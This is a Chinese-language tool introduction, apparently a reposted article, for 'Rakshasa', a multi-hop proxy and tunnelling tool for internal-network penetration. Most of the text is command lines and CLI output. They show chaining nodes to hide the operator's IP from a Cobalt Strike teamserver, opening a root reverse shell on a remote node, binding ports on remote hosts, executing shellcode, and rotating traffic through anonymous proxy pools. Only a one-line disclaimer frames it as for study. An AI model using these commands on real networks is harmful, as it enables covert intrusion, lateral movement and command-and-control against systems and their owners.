【神兵利器】内网渗透之多级代理工具
【神兵利器】内网渗透之多级代理工具
项目介绍
Rakshasa是一个使用Go语言编写的强大多级代理工具,专为实现多级代理,内网穿透而设计。它可以在节点群里面任意两个节点之间转发TCP请求和响应,同时支持socks5代理,http代理,并且可以引入外部http、socks5代理池,自动切换请求IP。
节点之间使用内置证书的TLS加密TCP通讯,再叠加一层自定义秘钥的AES加密,可以在所有Go支持的平台使用。可以在你所有的的Windows和Linux服务器上搭建节点并组成节点群网络。
节点分为普通节点(node)与控制节点(fullnode)
- 普通节点,无法控制其他节点进行代理、shell等操作
- 控制节点,全功能节点
功能支持
功能支持列表如下:
- 自动实现多层代理
- 支持Tcp转发代理
- 支持Tcp反向代理
- 支持Socks5代理 (包含UDP和TCP6)
- 支持Socks5反向代理
- 支持HTTP代理 (爬虫利器,流量出口支持代理池)
- 去中心化
- 支持多个节点连接
- 支持配置文件,可以配置代理服务器的端口、目标服务器的地址和端口、证书文件等信息
- 支持日志记录,记录代理服务器的请求和响应信息
- CLI模式实现远程Shell
- 执行shellcode
项目使用
在本地1080端口启动一个socks5,连接到192.168.1.2的节点上,流量出口位于 192,.168.1.2
rakshasa -socks5 1080 -d 192.168.1.2:1080 方向从右往左(加上本机应该是3个节点),在192.168.1.3这台机器上开启一个socks5端口1081,流量穿透到本地节点出去
rakshasa -remotesocks5 1081 -d 192.168.1.2:1080,192.168.1.3:1080 本地监听并转发到指定ip端口,使用场景本机cs连接teamserver,隐藏本机ip,例如:本机cs连接127.0.0.1:50050实际上通过1.3,1.4节点后,再连接到192.168.1.2:50050 teamserver,teamserver看到你的ip是最后一个节点的ip
rakshasa -connect 127.0.0.1:50050,192,168,1,2:50050 -d 192.168.1.3:1080,192.168.1.4:1080远端监听端口,流量转到本地再出去,为-connect的反向代理模式,这里与上面相反,在最右端节点监听端口50050,流量到本机节点后最终发往192.168.1.2,最终上线 IP 为本机IP
rakshasa -bind 192.168.1.2:50050,0,0,0.0:50050 -d 192.168.1.3:1080,192.168.1.4:1080CLI 使用
(1) 名词介绍与使用要点
- 每个节点都会生成一个UUID,重启后UUID会改变
- 大部分子命令菜单下,都集成了 new(连接节点)、print(打印节点)、ping(测试节点延迟)功能
- 可用 print 命令,查看在当前节点下,各个节点的 ID、UUID 和 IP 端口
- 与其他节点进行交互的时候,可以使用ID、UUID、IP:端口去操作
例如:
rakshasa>print
ID UUID HostName GOOS IP listenIP
-----------------------------------------------------------------------------------------------------------------------------
1 33fe3ab6-36fe-4636-b684-6f9d9e417981 DESKTOP-KP6GDI2 windows x64 192.168.1.151:8883
rakshasa>ping 1
rakshasa>ping 33fe3ab6-36fe-4636-b684-6f9d9e417981
rakshasa>ping 192.168.1.151:8883(2) noCLI 不能使用命令行CLI模式:
启动rakshasa,默认监听8883,执行help
start on port: 8883
rakshasa>help
Commands:
bind 进入bind功能
clear clear the screen
config 配置管理
connect 进入connect功能
exit exit the program
help display help
httpProxy 进入httpProxy功能
new 与一个或者多个节点连接,使用方法 new ip:端口 多个地址以,间隔 如1080 127.0.0.1:1081,127.0.0.1:1082
ping ping 节点
print 列出所有节点
remoteShell 远程shell
remoteSocks5 进入remoteSocks5功能
shellcode 执行shellcode
socks5 进入socks5功能连接到其他节点,print当前网络所有节点
rakshasa>new 127.0.0.1:8881
rakshasa>print
ID UUID HostName GOOS IP listenIP
-----------------------------------------------------------------------------------------------------------------------------
1 33fe3ab6-36fe-4636-b684-6f9d9e417981 DESKTOP-KP6GDI2 windows x64 192.168.1.151:8883
2 6a6dafb7-ddc9-4da3-afd2-5423038b20ab DESKTOP-KP6GDI2 windows x64 192.168.1.151:8882
3 abc6c7aa-52d0-4a33-8688-cd2df23641cd DESKTOP-KP6GDI2 windows x64 (localhost):8883
4 e06abfdc-320e-4eb1-9545-8fdf1536fd86 DESKTOP-KP6GDI2 windows x64 192.168.1.151:8880
5 e19e6d3e-4cdf-4573-9357-d31ee33587f7 DESKTOP-KP6GDI2 windows x64 192.168.1.151:8881测试某个节点延迟
rakshasa>ping 6a6dafb7-ddc9-4da3-afd2-5423038b20ab
ping 6a6dafb7-ddc9-4da3-afd2-5423038b20ab 674µs特别说明:如果使用UUID操作某一命令,则会自动根据网络连接情况,将消息发送到该节点 如下图例子,我们处于内网的节点A,通过ip可以连接到B公网的机器,不能连到CD,但是B和C是连通,C和D是连通的。当我们请求D机器的时候,消息会通过B,C最终到达D,不需要特别指定
(3) CLI模式远程shell示例
执行remoteShell进入远程shell
rakshasa\remoteShell>help
Commands:
clear clear the screen
exit exit the program
file 连到节点进行文件管理,参数为id或者uuid
help display help
new 与一个或者多个节点连接,使用方法 new ip:端口 多个地址以,间隔 如1080 127.0.0.1:1081,127.0.0.1:1082
print 列出所有节点
shell 反弹shell 使用方法 shell id/uuid 启动参数 ,启动参数可为空,win默认启动cmd,linux默认启动bash, 如 shell 1 powershell 。shell 1 zsh链接到节点:
rakshasa\remoteShell>shell feed089e-20aa-44d5-bbff-07c968a94ffc
root@virtual-machine:/data/socks5/rakshasa#ls
aes common config.yaml go.mod main.go readline README.md shell
cert config gencert go.sum rakshasa.exe readme server
root@virtual-machine:/data/socks5/rakshasa# whoami
root
root@virtual-machine:/data/socks5/rakshasa# uname -a
Linux virtual-machine 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
root@virtual-machine:/data/socks5/rakshasa#windows下也能执行linux的交互式命令,并正常显示,如htop
备注:windows建议使用powershell,cmd下会有一些输入显示bug
(4) CLI模式,反向代理bind示例————在远程节点上监听一个端口,转发到本地某个端口,使用方法 new-bind 本地ip:本地port,远程监听ip:远程监听port 目标节点
rakshasa\bind>new-bind 127.0.0.1:81,0.0.0.0:8808 192.168.1.180:8883
bind 启动成功
rakshasa\bind>
//在远程机器(192.168.1.180:8883)上,监听0.0.0.0:8808,将所有数据,通过本地节点,发送到127.0.0.1:81,(当然也可以是内网其他电脑ip端口或者其他公网)
rakshasa\bind>list
当前连接数量: 1
ID 1 本地端口 127.0.0.1:81 远程端口 0.0.0.0:8808 服务器uuid feed089e-20aa-44d5-bbff-07c968a94ffc
//feed089e-20aa-44d5-bbff-07c968a94ffc是(192.168.1.180:8883)的uuid在这个例子中我本地启动的是一个web服务,监听的是127.0.0.1:81,hello打印的是RemoteAddr()
然后打开浏览器,输入http://192.168.1.180:8808/hello/
可以看到浏览器的请求到192.168.1.180:8808,实际经过转发后到了本地127.0.0.1:81
(5) http代理池使用示例
D:\rakshasa>rakshasa -check_proxy in.txt
2023/03/19 19:24:55 地址 104.223.135.178:10000 通过匿名代理检测
2023/03/19 19:24:58 地址 169.55.89.6:80 通过匿名代理检测
2023/03/19 19:25:52 一共有2个代理通过检测,已保存到 out.txt
D:\rakshasa>rakshasa -http_proxy_pool out.txt -http_proxy 8080
start on port: 8883
httpProxy start :8080
2023/03/19 19:23:26 httpProxy 启动成功
rakshasa>使用curl查一下ip,请求所使用的代理每次请求都会改变
C:\Users\Administrator>curl -x http://127.0.0.1:8080 https://myip.fireflysoft.net/
169.55.89.6
C:\Users\Administrator>curl -x http://127.0.0.1:8080 https://myip.fireflysoft.net/
104.223.135.178免责声明
该开源工具是由作者按照开源许可证发布的,仅供个人学习和研究使用。作者不对您使用该工具所产生的任何后果负任何法律责任
腾讯云开发者
